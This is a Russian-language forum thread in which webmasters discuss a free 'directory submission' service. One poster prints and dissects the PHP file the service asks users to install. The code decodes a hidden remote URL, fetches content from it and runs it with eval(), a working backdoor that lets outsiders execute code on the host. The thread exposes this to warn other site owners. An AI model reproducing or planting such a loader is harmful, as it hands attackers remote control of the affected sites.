Бесплатный прогон сайта по каталогам

[vmaster36]

Доброго времени суток, народ!
Недавно случайно наткнулся на сервис автопрогона по каталогам - потерто. Но вот что то я очкую этим сервисом воспользоваться. Может кто пользовался уже и мнение своё выскажет... И стоит ли вообще им пользоваться молодым сайтам (как бы под ссылочный взрыв не попасть при этом)?

[wildkids]

Доброго времени суток, народ!
Недавно случайно наткнулся на сервис автопрогона по каталогам - . Но вот что то я очкую этим сервисом воспользоваться. Может кто пользовался уже и мнение своё выскажет... И стоит ли вообще им пользоваться молодым сайтам (как бы под ссылочный взрыв не попасть при этом)?

Сделал эксперимент, загрузил их файл 1.php, немедленно упали все мои сайты на хостинге из-за падения mySQL сервера, нехватка оперативной памяти.  При перезапуске сервера все повторилось. Чем занимался их файл, не знаю, но явно не регистрацией в катаплогах. После удаления их файла все стало работать.

[lokdown]

Открыл их код файла (1.php), который они предлагают установить на сайт:
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($b);eval($d); ?>
С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ.

Но всмотритесь теперь в строчку кода:
$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;
Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные.

Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес!

Сообщение полностью взято с форума pr-cy.ru и не важно что тут сайт называется по другому, я скачал этот файл и глянул содержимое. Оно идентично 1 в 1.
Не советую ничего такого подозрительного кидать себе на хостинг. Бесплатно не бывает ничего, тем более прогонов.

[autorenta]

только бАлбес будет закачивать к себе на хост неизвестные файлы...

[lokdown]

только бАлбес будет закачивать к себе на хост неизвестные файлы...

Неизвестные то ладно, но перед этим стоит посмотреть начинку сайта и решить, не нанесет ли она тебе вред в принципе.
А так согласен, лучше все файлы для начала антивирусом проверять и глазами)

[autorenta]

Неизвестные то ладно, но перед этим стоит посмотреть начинку сайта и решить, не нанесет ли она тебе вред в принципе.
А так согласен, лучше все файлы для начала антивирусом проверять и глазами)

каждый сайт в нете не проверить, а вот левые файлы хоть они и бесплатные так точно.

[lokdown]

каждый сайт в нете не проверить, а вот левые файлы хоть они и бесплатные так точно.

У kaspersky internet security есть возможность блoкировать подозрительные сайты, вкупе с web of trust можно спокойно серфить по интернету.

[vmaster36]

Мда... Судя по комментариям не зря всё ж очковал 
Всем спасибо за высказывания 

[DwayneND]

Малейший намёк на загрузку файла на хостинг (если это не файл вебмастера) уже должен насторожить и лучше если не знаешь забыть про эту затею вовсе.

[arendabusa]

Неизвестные то ладно, но перед этим стоит посмотреть начинку сайта и решить, не нанесет ли она тебе вред в принципе.
А так согласен, лучше все файлы для начала антивирусом проверять и глазами)

100 процентов